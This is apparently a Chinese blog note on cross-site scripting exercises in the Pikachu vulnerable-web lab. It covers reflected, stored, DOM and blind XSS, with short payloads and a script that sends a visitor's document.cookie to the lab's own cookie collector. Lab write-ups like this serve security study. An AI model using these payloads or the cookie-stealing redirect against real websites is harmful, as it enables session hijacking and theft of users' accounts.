网安-XSS-pikachu

介绍

XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码),当信任此Web服务器的用户访问

Web站点中含有恶意脚本代码的页面,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。

XSS分类一般如下:

1.反射型XSS

2.存储型XSS

3.DOM型XSS

1.反射型XSS,非持久性XSS

alert(document.cookie) //弹出当前cookie

2.存储型XSS,持久性XSS,JS代码会存在后台

3.DOM型XSS也是一种反射型,但是输入的语句不是JS的语句,是DOM语法

'"><img onerror=alert(0) src=><"'

利用XSS进行攻击:

攻击方:

找到存储cookie的url:http://localhost/pikachu/pkxss/xssmanager.php/xcookie/cookie.php

编辑攻击代码:

<script>

document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;

</script>

用户访问留言板,攻击方就收集到用户的cookie 了

4.XSS盲打

攻击的注入点(用户提交数据的页面)和显示点(管理员查看数据的页面)不同。

输入的内容不会在前端输出,而是提交到了后台。

管理员登录后台管理界面,可能遭受到XSS攻击。

5.XSS过滤

<script>

alert(document.cookie)

</script>

相关推荐
像风一样自由20201 小时前
HTML与JavaScript:构建动态交互式Web页面的基石
前端·javascript·html
aiprtem2 小时前
基于Flutter的web登录设计
前端·flutter
浪裡遊2 小时前
React Hooks全面解析:从基础到高级的实用指南
开发语言·前端·javascript·react.js·node.js·ecmascript·php
why技术2 小时前
Stack Overflow,轰然倒下!
前端·人工智能·后端
GISer_Jing2 小时前
0704-0706上海,又聚上了
前端·新浪微博
止观止2 小时前
深入探索 pnpm:高效磁盘利用与灵活的包管理解决方案
前端·pnpm·前端工程化·包管理器
whale fall3 小时前
npm install安装的node_modules是什么
前端·npm·node.js
烛阴3 小时前
简单入门Python装饰器
前端·python
袁煦丞3 小时前
数据库设计神器DrawDB:cpolar内网穿透实验室第595个成功挑战
前端·程序员·远程工作
天天扭码4 小时前
从图片到语音:我是如何用两大模型API打造沉浸式英语学习工具的
前端·人工智能·github